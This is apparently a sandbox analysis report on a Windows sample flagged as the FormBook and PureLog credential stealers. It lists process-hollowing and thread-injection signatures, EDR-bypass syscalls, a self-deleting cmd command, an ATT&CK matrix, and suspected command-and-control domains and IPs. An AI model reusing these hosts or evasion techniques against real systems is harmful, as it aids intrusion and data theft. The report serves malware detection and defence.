              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0113EB1D mov eax, dword ptr fs:[00000030h]3_2_0113EB1D
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0113EB1D mov eax, dword ptr fs:[00000030h]3_2_0113EB1D
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01194B00 mov eax, dword ptr fs:[00000030h]3_2_01194B00
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010EEB20 mov eax, dword ptr fs:[00000030h]3_2_010EEB20
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010EEB20 mov eax, dword ptr fs:[00000030h]3_2_010EEB20
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01188B28 mov eax, dword ptr fs:[00000030h]3_2_01188B28
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01188B28 mov eax, dword ptr fs:[00000030h]3_2_01188B28
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0116EB50 mov eax, dword ptr fs:[00000030h]3_2_0116EB50
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01192B57 mov eax, dword ptr fs:[00000030h]3_2_01192B57
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01192B57 mov eax, dword ptr fs:[00000030h]3_2_01192B57
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01192B57 mov eax, dword ptr fs:[00000030h]3_2_01192B57
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01192B57 mov eax, dword ptr fs:[00000030h]3_2_01192B57
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01168B42 mov eax, dword ptr fs:[00000030h]3_2_01168B42
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01156B40 mov eax, dword ptr fs:[00000030h]3_2_01156B40
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01156B40 mov eax, dword ptr fs:[00000030h]3_2_01156B40
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0118AB40 mov eax, dword ptr fs:[00000030h]3_2_0118AB40
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010B8B50 mov eax, dword ptr fs:[00000030h]3_2_010B8B50
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01174B4B mov eax, dword ptr fs:[00000030h]3_2_01174B4B
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01174B4B mov eax, dword ptr fs:[00000030h]3_2_01174B4B
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010BCB7E mov eax, dword ptr fs:[00000030h]3_2_010BCB7E
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01174BB0 mov eax, dword ptr fs:[00000030h]3_2_01174BB0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01174BB0 mov eax, dword ptr fs:[00000030h]3_2_01174BB0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D0BBE mov eax, dword ptr fs:[00000030h]3_2_010D0BBE
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D0BBE mov eax, dword ptr fs:[00000030h]3_2_010D0BBE
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C0BCD mov eax, dword ptr fs:[00000030h]3_2_010C0BCD
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C0BCD mov eax, dword ptr fs:[00000030h]3_2_010C0BCD
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C0BCD mov eax, dword ptr fs:[00000030h]3_2_010C0BCD
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010E0BCB mov eax, dword ptr fs:[00000030h]3_2_010E0BCB
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010E0BCB mov eax, dword ptr fs:[00000030h]3_2_010E0BCB
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010E0BCB mov eax, dword ptr fs:[00000030h]3_2_010E0BCB
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0116EBD0 mov eax, dword ptr fs:[00000030h]3_2_0116EBD0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0114CBF0 mov eax, dword ptr fs:[00000030h]3_2_0114CBF0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010EEBFC mov eax, dword ptr fs:[00000030h]3_2_010EEBFC
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C8BF0 mov eax, dword ptr fs:[00000030h]3_2_010C8BF0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C8BF0 mov eax, dword ptr fs:[00000030h]3_2_010C8BF0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C8BF0 mov eax, dword ptr fs:[00000030h]3_2_010C8BF0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0114CA11 mov eax, dword ptr fs:[00000030h]3_2_0114CA11
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010EEA2E mov eax, dword ptr fs:[00000030h]3_2_010EEA2E
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FCA24 mov eax, dword ptr fs:[00000030h]3_2_010FCA24
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FCA38 mov eax, dword ptr fs:[00000030h]3_2_010FCA38
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010E4A35 mov eax, dword ptr fs:[00000030h]3_2_010E4A35
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010E4A35 mov eax, dword ptr fs:[00000030h]3_2_010E4A35
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D0A5B mov eax, dword ptr fs:[00000030h]3_2_010D0A5B
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D0A5B mov eax, dword ptr fs:[00000030h]3_2_010D0A5B
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C6A50 mov eax, dword ptr fs:[00000030h]3_2_010C6A50
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C6A50 mov eax, dword ptr fs:[00000030h]3_2_010C6A50
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C6A50 mov eax, dword ptr fs:[00000030h]3_2_010C6A50
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C6A50 mov eax, dword ptr fs:[00000030h]3_2_010C6A50
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C6A50 mov eax, dword ptr fs:[00000030h]3_2_010C6A50
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C6A50 mov eax, dword ptr fs:[00000030h]3_2_010C6A50
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C6A50 mov eax, dword ptr fs:[00000030h]3_2_010C6A50
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FCA6F mov eax, dword ptr fs:[00000030h]3_2_010FCA6F
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FCA6F mov eax, dword ptr fs:[00000030h]3_2_010FCA6F
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FCA6F mov eax, dword ptr fs:[00000030h]3_2_010FCA6F
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0113CA72 mov eax, dword ptr fs:[00000030h]3_2_0113CA72
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0113CA72 mov eax, dword ptr fs:[00000030h]3_2_0113CA72
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0116EA60 mov eax, dword ptr fs:[00000030h]3_2_0116EA60
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010CEA80 mov eax, dword ptr fs:[00000030h]3_2_010CEA80
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010CEA80 mov eax, dword ptr fs:[00000030h]3_2_010CEA80
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010CEA80 mov eax, dword ptr fs:[00000030h]3_2_010CEA80
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010CEA80 mov eax, dword ptr fs:[00000030h]3_2_010CEA80
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010CEA80 mov eax, dword ptr fs:[00000030h]3_2_010CEA80
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010CEA80 mov eax, dword ptr fs:[00000030h]3_2_010CEA80
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010CEA80 mov eax, dword ptr fs:[00000030h]3_2_010CEA80
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010CEA80 mov eax, dword ptr fs:[00000030h]3_2_010CEA80
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010CEA80 mov eax, dword ptr fs:[00000030h]3_2_010CEA80
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01194A80 mov eax, dword ptr fs:[00000030h]3_2_01194A80
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F8A90 mov edx, dword ptr fs:[00000030h]3_2_010F8A90
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_0062647E GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,5_2_0062647E
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_0062DCAA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0062DCAA
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              System process connects to network (likely due to code injection or exploit)
              Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.19 80Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 209.196.146.115 80Jump to behavior
              Found direct / indirect Syscall (likely to bypass EDR)
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeNtClose: Indirect: 0x101A56C
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeNtQueueApcThread: Indirect: 0x101A4F2Jump to behavior
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeMemory written: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe base: 400000 value starts with: 4D5AJump to behavior
              Maps a DLL or memory area into another process
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeSection loaded: NULL target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeSection loaded: NULL target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
              Modifies the context of a thread in another process (thread injection)
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeThread register set: target process: 4084Jump to behavior
              Source: C:\Windows\SysWOW64\cscript.exeThread register set: target process: 4084Jump to behavior
              Queues an APC in another process (thread injection)
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
              Sample uses process hollowing technique
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeSection unmapped: C:\Windows\SysWOW64\cscript.exe base address: 620000Jump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeProcess created: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe "C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe"Jump to behavior
              Source: explorer.exe, 00000004.00000002.3827556743.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3075898374.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2713108965.000000000936E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: explorer.exe, 00000004.00000002.3819655091.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3820468755.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.1390357490.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
              Source: explorer.exe, 00000004.00000002.3820468755.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.1390357490.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
              Source: explorer.exe, 00000004.00000002.3820468755.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.1390357490.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
              Source: explorer.exe, 00000004.00000002.3827556743.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3075898374.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2713108965.000000000936E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd]1Q
              Source: C:\Windows\SysWOW64\cscript.exeCode function: GetUserDefaultLCID,FreeLibrary,GetLocaleInfoA,LoadStringA,GetModuleFileNameA,CharNextA,memcpy,strcpy_s,LoadLibraryExA,LoadLibraryExA,sprintf_s,CharNextA,memcpy,strcpy_s,LoadLibraryExA,LoadLibraryExA,GetUserDefaultLCID,GetLocaleInfoA,sprintf_s,CharNextA,memcpy,strcpy_s,LoadLibraryExA,LoadLibraryExA,5_2_0062AADC
              Source: C:\Windows\SysWOW64\cscript.exeCode function: GetLocaleInfoW,wcsncmp,5_2_00637E85
              Source: C:\Windows\SysWOW64\cscript.exeCode function: GetLocaleInfoW,5_2_0062AB35
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeQueries volume information: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_0062DC00 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,5_2_0062DC00
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_00627490 RegOpenKeyExW,RegOpenKeyExW,SysFreeString,RegCloseKey,RegCloseKey,WideCharToMultiByte,__alloca_probe_16,WideCharToMultiByte,RegOpenKeyExA,GetLastError,RegisterEventSourceW,GetUserNameW,LookupAccountNameW,LookupAccountNameW,ReportEventW,DeregisterEventSource,5_2_00627490
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_0062A9C0 InitializeCriticalSection,GetVersionExA,5_2_0062A9C0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 3.2.AB2hQJZ77ipdWem.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.AB2hQJZ77ipdWem.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.3820022788.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.3819748664.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1388754633.0000000004119000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Yara detected PureLog Stealer
              Source: Yara matchFile source: 0.2.AB2hQJZ77ipdWem.exe.5a20000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.AB2hQJZ77ipdWem.exe.5a20000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1391140026.0000000005A20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1388307588.000000000315B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 3.2.AB2hQJZ77ipdWem.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.AB2hQJZ77ipdWem.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.3820022788.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.3819748664.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1388754633.0000000004119000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Yara detected PureLog Stealer
              Source: Yara matchFile source: 0.2.AB2hQJZ77ipdWem.exe.5a20000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.AB2hQJZ77ipdWem.exe.5a20000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1391140026.0000000005A20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1388307588.000000000315B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_00635880 CreateBindCtx,MkParseDisplayName,5_2_00635880
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_0062CD6C CoCreateInstance,CoCreateInstance,GetUserDefaultLCID,CoGetClassObject,CreateBindCtx,5_2_0062CD6C

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Native API              		1
              DLL Side-Loading              		612
              Process Injection              		1
              Masquerading              		OS Credential Dumping1
              System Time Discovery              		Remote Services11
              Archive Collected Data              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Shared Modules              		Boot or Logon Initialization Scripts1
              Abuse Elevation Control Mechanism              		1
              Disable or Modify Tools              		LSASS Memory231
              Security Software Discovery              		Remote Desktop ProtocolData from Removable Media2
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              DLL Side-Loading              		41
              Virtualization/Sandbox Evasion              		Security Account Manager2
              Process Discovery              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook612
              Process Injection              		NTDS41
              Virtualization/Sandbox Evasion              		Distributed Component Object ModelInput Capture12
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              Deobfuscate/Decode Files or Information              		LSA Secrets1
              Application Window Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Abuse Elevation Control Mechanism              		Cached Domain Credentials1
              Account Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
              Obfuscated Files or Information              		DCSync1
              System Owner/User Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job22
              Software Packing              		Proc Filesystem1
              File and Directory Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
              DLL Side-Loading              		/etc/passwd and /etc/shadow224
              System Information Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1476627 Sample: AB2hQJZ77ipdWem.exe Startdate: 19/07/2024 Architecture: WINDOWS Score: 100 31 www.suv.xyz 2->31 33 www.mxrkpkngishbdss.xyz 2->33 35 17 other IPs or domains 2->35 43 Snort IDS alert for network traffic 2->43 45 Found malware configuration 2->45 47 Malicious sample detected (through community Yara rule) 2->47 51 11 other signatures 2->51 11 AB2hQJZ77ipdWem.exe 3 2->11         started        signatures3 49 Performs DNS queries to domains with low reputation 33->49 process4 file5 29 C:\Users\user\...\AB2hQJZ77ipdWem.exe.log, ASCII 11->29 dropped 63 Tries to detect virtualization through RDTSC time measurements 11->63 65 Injects a PE file into a foreign processes 11->65 67 Switches to a custom stack to bypass stack traces 11->67 15 AB2hQJZ77ipdWem.exe 11->15         started        signatures6 process7 signatures8 69 Modifies the context of a thread in another process (thread injection) 15->69 71 Maps a DLL or memory area into another process 15->71 73 Sample uses process hollowing technique 15->73 75 2 other signatures 15->75 18 explorer.exe 56 1 15->18 injected process9 dnsIp10 37 parkingpage.namecheap.com 91.195.240.19, 49431, 80 SEDO-ASDE Germany 18->37 39 www.wordcraftart.fun 170.39.213.118, 49435, 80 PETRONAS-BHD-AS-APPetroliamNasionalBerhadMY Reserved 18->39 41 4 other IPs or domains 18->41 53 System process connects to network (likely due to code injection or exploit) 18->53 22 cscript.exe 18->22         started        signatures11 process12 signatures13 55 Modifies the context of a thread in another process (thread injection) 22->55 57 Maps a DLL or memory area into another process 22->57 59 Tries to detect virtualization through RDTSC time measurements 22->59 61 Switches to a custom stack to bypass stack traces 22->61 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              AB2hQJZ77ipdWem.exe66%ReversingLabsByteCode-MSIL.Backdoor.FormBook
              AB2hQJZ77ipdWem.exe100%AviraHEUR/AGEN.1306125
              AB2hQJZ77ipdWem.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
              https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
              https://excel.office.com0%URL Reputationsafe
              https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
              https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
              https://outlook.com0%URL Reputationsafe
              https://android.notify.windows.com/iOS0%URL Reputationsafe
              http://schemas.micro0%URL Reputationsafe
              https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
              http://www.fwbsmg.life0%Avira URL Cloudsafe
              https://powerpoint.office.comer0%Avira URL Cloudsafe
              https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world0%Avira URL Cloudsafe
              http://www.bt365851.com0%Avira URL Cloudsafe
              https://android.notify.windows.com/iOSA40%Avira URL Cloudsafe
              http://www.lawyers-br-pt-9390663.fyiReferer:0%Avira URL Cloudsafe
              http://www.syedlatief.comReferer:0%Avira URL Cloudsafe
              https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-10%Avira URL Cloudsafe
              http://www.wordcraftart.fun/v15n/?JRv=XrEdp4JX&sr=90AMgQB2NDTL00GN4iM7gX4woUZ3upfO9yCtQrIdbfLXDlf/PtDiDRZV6/VBSbbmWq2J0%Avira URL Cloudsafe
              http://www.kurainu.xyz/v15n/www.y7rak9.com100%Avira URL Cloudmalware
              http://www.kurainu.xyz100%Avira URL Cloudmalware
              http://www.brunoduarte.online0%Avira URL Cloudsafe
              http://www.creativelyloud.com/v15n/www.kurainu.xyz0%Avira URL Cloudsafe
              http://www.mxrkpkngishbdss.xyz/v15n/0%Avira URL Cloudsafe
              http://www.wordcraftart.fun/v15n/0%Avira URL Cloudsafe
              http://www.lawyers-br-pt-9390663.fyi/v15n/www.boostgrowmode.com0%Avira URL Cloudsafe
              https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal0%Avira URL Cloudsafe
              http://www.microsoft.c0%Avira URL Cloudsafe
              http://www.y7rak9.com/v15n/www.wordcraftart.fun0%Avira URL Cloudsafe
              http://www.boostgrowmode.com/v15n/0%Avira URL Cloudsafe
              http://www.kedai168ef.com/v15n/www.bt365851.com0%Avira URL Cloudsafe
              http://www.mxrkpkngishbdss.xyzReferer:0%Avira URL Cloudsafe
              https://android.notify.windows.com/iOSd0%Avira URL Cloudsafe
              http://www.autoitscript.com/autoit3/J0%Avira URL Cloudsafe
              https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi0%Avira URL Cloudsafe
              http://www.creativelyloud.com0%Avira URL Cloudsafe
              http://www.suv.xyzReferer:0%Avira URL Cloudsafe
              http://www.suv.xyz/v15n/?sr=vAzU6JYnADLUgEemxRzkUQMY3qynAzl+X72N7mZcinpf+VhfhGS/tUhrfESL21IfICFO&JRv=XrEdp4JX0%Avira URL Cloudsafe
              http://www.mxrkpkngishbdss.xyz/v15n/www.lawyers-br-pt-9390663.fyi0%Avira URL Cloudsafe
